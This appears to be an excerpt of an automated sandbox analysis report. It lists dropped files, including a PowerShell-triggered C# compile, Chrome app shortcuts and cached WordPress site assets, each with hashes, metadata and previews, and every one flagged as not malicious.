                                                                        Entropy (8bit):5.341894138593666
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F404694D3EC48ACC8CECB980FA2ED128
                                                                        SHA1:CE9DB252FD00CF9BA0BD9B49D2E42482E72E0C41
                                                                        SHA-256:AA857AE211B351B182CDD7EAFF91280FBD5325DED3BF901046F6AAFE40C51F58
                                                                        SHA-512:CB0D827DD71B5653B560B15AADA8746906697BDB2CFA76F8245616E297EEB926CC55CB4F819ED1B920772E4F5B3D22A5A885B4D52D628A83C2162E6019B49ED2
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:.C:\Windows\system32\WindowsPowerShell\v1.0> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qwzwa2hv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\qwzwa2hv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):0
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0D23EC57526954B73D4CD81DEB975D5B
                                                                        SHA1:F202AECCFA251416B7DD76DA1B3B1F86A039D61C
                                                                        SHA-256:7175F7245F510E4E13883F6A60E4FF4D807C187ACC11FA13A00568632EFB2270
                                                                        SHA-512:67FCE0F06C7C9D40F12A2F05DE551D1C3AD0094B6F5F3D948946D7698F39CFBE2CA5D86261BD482E1B3009BE7909311F0D1C393A235E12422AFADD6E5B631D40
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...................................FL..................F.".. ......{4....b)X.L..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...$.q-.L....4X.L......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H.Ycc..............................A.p.p.D.a.t.a...B.V.1......Yhc..Roaming.@......FW.H.Yhc..........................beR.R.o.a.m.i.n.g.....\.1......Yec..MICROS~1..D......FW.H.Ymc..........................p...M.i.c.r.o.s.o.f.t.....V.1.....GX,w..Windows.@......FW.H.Ycc...........................P.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H.Ycc....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Yqc..Programs..j......FW.H.Yrc....................@.....H.s.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H.Yrc..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H.Y.c....Q...........

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HGI93ZEGCU2CFZNY6ERA.temp

                                                                        Download File
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6220
                                                                        Entropy (8bit):3.716919721194766
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:0D23EC57526954B73D4CD81DEB975D5B
                                                                        SHA1:F202AECCFA251416B7DD76DA1B3B1F86A039D61C
                                                                        SHA-256:7175F7245F510E4E13883F6A60E4FF4D807C187ACC11FA13A00568632EFB2270
                                                                        SHA-512:67FCE0F06C7C9D40F12A2F05DE551D1C3AD0094B6F5F3D948946D7698F39CFBE2CA5D86261BD482E1B3009BE7909311F0D1C393A235E12422AFADD6E5B631D40
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:...................................FL..................F.".. ......{4....b)X.L..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........{4...$.q-.L....4X.L......t...CFSF..1.....FW.H..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......FW.H.Ycc..............................A.p.p.D.a.t.a...B.V.1......Yhc..Roaming.@......FW.H.Yhc..........................beR.R.o.a.m.i.n.g.....\.1......Yec..MICROS~1..D......FW.H.Ymc..........................p...M.i.c.r.o.s.o.f.t.....V.1.....GX,w..Windows.@......FW.H.Ycc...........................P.W.i.n.d.o.w.s.......1.....FW.H..STARTM~1..n......FW.H.Ycc....................D.....R=..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......Yqc..Programs..j......FW.H.Yrc....................@.....H.s.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......FW.H.Yrc..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......FW.H.Y.c....Q...........

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 11:27:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2673
                                                                        Entropy (8bit):3.9741823776359015
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E6D513F0FF94E32BD1232002040058EF
                                                                        SHA1:82DA63F2ABD82B50AE503789B127E999F1E8A7CC
                                                                        SHA-256:DEF415AA9227FF68F048495D19634A5FC8625651AAE9F1207174392936DDC305
                                                                        SHA-512:9470903AC69A38888DFC5B497EAE9D09DCA4BC278DD29069E315B6DDE173AEEC81E14E388704CA7861D3CA14DB324776E316C13040DC71160FBEFD390D6C9D94
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,......18.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Ycc....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ypc....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ypc....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ypc..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yqc...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........h<.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 11:27:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2675
                                                                        Entropy (8bit):3.99157713831403
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:F074DAA6FD8FEFF29AAB6FF6FBC56BAC
                                                                        SHA1:2A4A423E62789307294FAB77F3BF4752F2A1A9E0
                                                                        SHA-256:3F627CA2249A1E03252D06C29AAFAD7C56F3F500457E91524640DA0F8C392FD1
                                                                        SHA-512:E687CB296C8A859EEB943EFA629CAB822C8A304B9B3580FF6EB57188C28B70677BEF164230897BAFF0BB51F6660D2176AEFD1C8B752825D4AE9A0553DE2FDF9C
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,......&8.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Ycc....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ypc....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ypc....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ypc..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yqc...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........h<.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2689
                                                                        Entropy (8bit):3.999441196020014
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:57D95DC717DDC1753286B9FBF438792D
                                                                        SHA1:537A3AECD47CA5D66A1C53D0AFEE45D4229A9D03
                                                                        SHA-256:0ECADBE89B6BF69013E5A143A85DB7AD633DC19977E8541C36EF081BEAC3AB85
                                                                        SHA-512:25B2BD31A00EF5C7BBD07D5C81AE4338F7AE107EEA7D38164509A0AC42979929861CB6CADA8A5EB6003B6161A7CA5AED37EE617824341551C31FF387FD12F48D
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Ycc....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ypc....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ypc....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ypc..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........h<.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 11:27:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):3.9876320383893518
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:5579A03BDE4632CD577E57937EACF04A
                                                                        SHA1:B077C8BF9275BF46292DAC1B2DC19A16AEFA6B2A
                                                                        SHA-256:08FE87D33399752D8B66D2544A89826FB25B2E89DDDB63ACB982D789023DC5E5
                                                                        SHA-512:30DC97C439B45DD000E814E806BD8FC87BB2128B7075DE3B4533FE419F73356C79C324F0D0CD36B62098A52A6A9FB0072E99FB9A3DA60D7469D5B78E0C4F5A67
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,....i. 8.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Ycc....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ypc....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ypc....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ypc..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yqc...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........h<.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 11:27:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2677
                                                                        Entropy (8bit):3.97469973814344
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C80138306E65A4145E12CFA1C0964850
                                                                        SHA1:EDC2796AFC93008016446E722E02CC3D19941754
                                                                        SHA-256:E17B95E32E45C53BF4F2DC3E5B464860BA7026E182855FC32E917C87A169D3C2
                                                                        SHA-512:89355A9628E0D35F48DC7FB831A0702FD61A694BBF03F1FA3ABC7F17021FF1BE9513DA46E8EC3927DF7280BA4F5C9532A879EE86E2A77F8A88454DD05F08AF5E
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,....eL,8.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Ycc....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ypc....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ypc....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ypc..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yqc...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........h<.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Dec 12 11:27:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):2679
                                                                        Entropy (8bit):3.988506566704142
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:55A5B3083C6F998C444255DF3F281186
                                                                        SHA1:7765EBA84B3E712FF5F6733C5224FABF4AEF1F1F
                                                                        SHA-256:99D7FEA068D19983DFA6AB49D62186B1B699CAE84A8FA01E6D80B34F4AD71FD4
                                                                        SHA-512:F5AB89A62757DB01D642EC8E2E94F1010B15C3850D506349D16F26E07C8174364A19B7DB12CE2C2DD2C3BB0E46C8D62292742DB5DC7749F5A5F161F1A7A938E4
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:L..................F.@.. ...$+.,.....=.8.L..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I.Ycc....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Ypc....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Ypc....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Ypc..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Yqc...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........h<.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                        Chrome Cache Entry: 234

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:Unicode text, UTF-8 text, with very long lines (62753), with no line terminators
                                                                        Category:downloaded
                                                                        Size (bytes):62755
                                                                        Entropy (8bit):4.848886996046838
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:979B8B56E801469D95453055366EF54C
                                                                        SHA1:CB8A0BB5F00FEE130A289EA4DFAFC00FA53E1C04
                                                                        SHA-256:D3322CCB3912F7A9485EB1D75971FD5E1EB49C6575FF5AD985FB5496333E8C8B
                                                                        SHA-512:AFD7E2E5E1C908F3D4AAC6151E3ECF4D575222EADC5458C4118BF9C4E05D150D77CEF43E0A3D36101E0D1288973C27BB576F46B1449E9CE537C03E15AE5BF3BE
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=6.6.1
                                                                        Preview:@charset "UTF-8";:root{--woocommerce:#a46497;--wc-green:#7ad03a;--wc-red:#a00;--wc-orange:#ffba00;--wc-blue:#2ea2cc;--wc-primary:#a46497;--wc-primary-text:white;--wc-secondary:#ebe9eb;--wc-secondary-text:#515151;--wc-highlight:#77a464;--wc-highligh-text:white;--wc-content-bg:#fff;--wc-subtext:#767676}@-webkit-keyframes spin{100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@keyframes spin{100%{-webkit-transform:rotate(360deg);transform:rotate(360deg)}}@font-face{font-family:star;src:url(../fonts/star.eot);src:url(../fonts/star.eot?#iefix) format("embedded-opentype"),url(../fonts/star.woff) format("woff"),url(../fonts/star.ttf) format("truetype"),url(../fonts/star.svg#star) format("svg");font-weight:400;font-style:normal}@font-face{font-family:WooCommerce;src:url(../fonts/WooCommerce.eot);src:url(../fonts/WooCommerce.eot?#iefix) format("embedded-opentype"),url(../fonts/WooCommerce.woff) format("woff"),url(../fonts/WooCommerce.ttf) format("truetype"),url(../fonts/WooCommerc

                                                                        Chrome Cache Entry: 238

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (57791)
                                                                        Category:dropped
                                                                        Size (bytes):58072
                                                                        Entropy (8bit):5.247960089226309
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:E1D98D47689E00F8ECBC5D9F61BDB42E
                                                                        SHA1:6778FED3CF095A318141A31F455C8F4663885BDE
                                                                        SHA-256:0A34A87842C539C1F4FEEC56BBA982FD596B73500046A6E6FE38A22260C6577B
                                                                        SHA-512:021E615983F30EC5477FD8B611E8C5045AC6D9900F9A9BB8649B56E0C7D282965A727F8CF501C3B7E1DDFF02F5B44924D5481BCEA7A926BE8A9E166314A07ED0
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:/*!. * Bootstrap v4.3.1 (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e((t=t||self).bootstrap={},t.jQuery,t.Popper)}(this,function(t,g,u){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function l(o){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},e=Object.keys(r);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(r).filter(function(t){return Object.getOwnPropertyDescriptor

                                                                        Chrome Cache Entry: 239

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                        Category:downloaded
                                                                        Size (bytes):440
                                                                        Entropy (8bit):7.030367132128833
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:7AFB68F6F985FF9DA11D01FBAA61EE8D
                                                                        SHA1:B87A5E7620392C23A02507B29655F0AA43F8A8C0
                                                                        SHA-256:19F3B464EFAC9CBAC3BC1224A39CD06BAD1FE361DE9C1794EF50FDAED825C67F
                                                                        SHA-512:F77F03CADD5B98C63259DF75506F66241341412AC960C043C0CFA8C0A1820345385B876FE627F5576451EFD6E1B22F4705A675860AEBB0449C61B2E1E3ADC804
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-content/plugins/gtranslate/flags/16/it.png
                                                                        Preview:.PNG........IHDR................a....pHYs................ cHRM..z%..............u0...`..:....o._.F...>IDATx..=N.@....m@.$."MJ:..U.4...C..$..F..(Bb.g....Xq.v.(#.vF.}.f...61.l....Y.'..gwW_..7........B..........W~.u|TPV.....h.@.|FbSF:i../.?8.G...B....=%..F...e..h.B.m4#.....~*~<)...M.0.'.$.i#..<\..N.....RZ.6^|#..2.3......&jG.U.Z.P..8;g..zD<.P....Z..A[[20....R/.(..1.l...3~..<.....u.]+g.t.>....$....b..5.r..M..w....hL.....IEND.B`.

                                                                        Chrome Cache Entry: 240

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (343)
                                                                        Category:dropped
                                                                        Size (bytes):47022
                                                                        Entropy (8bit):4.191716823089285
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C8BCA704A3B7D6455566376D42EB63E6
                                                                        SHA1:9389F63FDD52C81E99FDA08233094A2008DEE8A6
                                                                        SHA-256:40CC3ED05635E77032BEDE8682A49313A2238D0023C753327A9FE22AB8595B96
                                                                        SHA-512:91240898683169CA42177A53D9C513BD3C5AB52893AD450D0F855BA55013975D35B15AB42C33C11F05DCC9A21DD4FCECA82D87B0F0C5F3C18211436720B02570
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        Preview:(function ($) {. "use strict";. var $window = $( window ),. $document = $( document ),. $body = $( 'body' );. var CIENA = CIENA || {};. CIENA.init = function () {. var _t = this;. _t.offCanvas();. _t.stickyHeader();. _t.stickyHeaderMobile();. _t.Vertical_Header();. _t.Announcement();. _t.CountDown();. _t.SwiperInit();. _t.woo_quantily();. _t.Search();. _t.Live_Search();. _t.FillterBtn();. _t.ToggleSubMenu();. _t.productThumbnailZoom();. _t.woofPagination();. _t.WL_update();. _t.Category_background();. _t.fullpage();. _t.InputState();. _t.Scroll_To_top();. _t.stickyAtc();. _t.Select2Init();. _t.ToggleBlockDropdown();. _t.loginPanelAuthenticate();. setTimeout(function () {. _t.Middle_Arrow();. _t.woofClearButton();. _t.checkScrollbar();. _t.

                                                                        Chrome Cache Entry: 242

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (4741)
                                                                        Category:downloaded
                                                                        Size (bytes):4776
                                                                        Entropy (8bit):5.153085086858448
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:C6FDDBB6BE69793478DE26FC245B2ACF
                                                                        SHA1:A136EBF5054FDC19729B3592005FE0FEFEC4BB4C
                                                                        SHA-256:9A1E0D38B691F1D22A92CFF65EC0439B428170AC39A4493C7ECB06D5585F56A3
                                                                        SHA-512:8A766304CAA9C888CFCAB64EABAB906905965E7FBCFC4F79C74AB122B892456ABAD215D0883DF17023A16A18BA15A6A4B3D0FA5345CAB7173D778F725B827C33
                                                                        Malicious:false
                                                                        Reputation:unknown
                                                                        URL:https://annavirgili.com/wp-includes/js/dist/hooks.min.js?ver=4d63a3d491d11ffd8ac6
                                                                        Preview:/*! This file is auto-generated */.(()=>{"use strict";var t={d:(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})},o:(t,e)=>Object.prototype.hasOwnProperty.call(t,e),r:t=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(t,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(t,"__esModule",{value:!0})}},e={};t.r(e),t.d(e,{actions:()=>P,addAction:()=>A,addFilter:()=>m,applyFilters:()=>w,applyFiltersAsync:()=>I,createHooks:()=>h,currentAction:()=>x,currentFilter:()=>T,defaultHooks:()=>f,didAction:()=>j,didFilter:()=>z,doAction:()=>g,doActionAsync:()=>k,doingAction:()=>O,doingFilter:()=>S,filters:()=>Z,hasAction:()=>_,hasFilter:()=>v,removeAction:()=>p,removeAllActions:()=>F,removeAllFilters:()=>b,removeFilter:()=>y});const n=function(t){return"string"!=typeof t||""===t?(console.error("The namespace must be a non-empty string."),!1):!!/^[a-zA-Z][a-zA-Z0-9_.\-\/]*$/.test(t)||(console.error("The namespace can only conta

                                                                        Chrome Cache Entry: 245

                                                                        Download File
                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        File Type:ASCII text, with very long lines (456)
                                                                        Category:dropped
                                                                        Size (bytes):648
                                                                        Entropy (8bit):5.172228476388626
                                                                        Encrypted:false
                                                                        SSDEEP:
                                                                        MD5:64E76CBD1EDB9629EDDC537E047CD84C
                                                                        SHA1:A8F8760FCE644F93E5D78B263CE08EAB0DCD1473
                                                                        SHA-256:EF0DB6421B0C850DC9B41F38B68B1AAA961719E9C95A160E7F763B0A3BE03419
                                                                        SHA-512:A8592DE8473A7A7941455AF182120ADC3FDF2F3B992372C6197E5497741BE43FFCBE9B892D563C264D7A27F043E4B4E7D9A01F6BFC231168329A0B83CF1C58FB
                                                                        Malicious:false
                                                                        Reputation:unknown
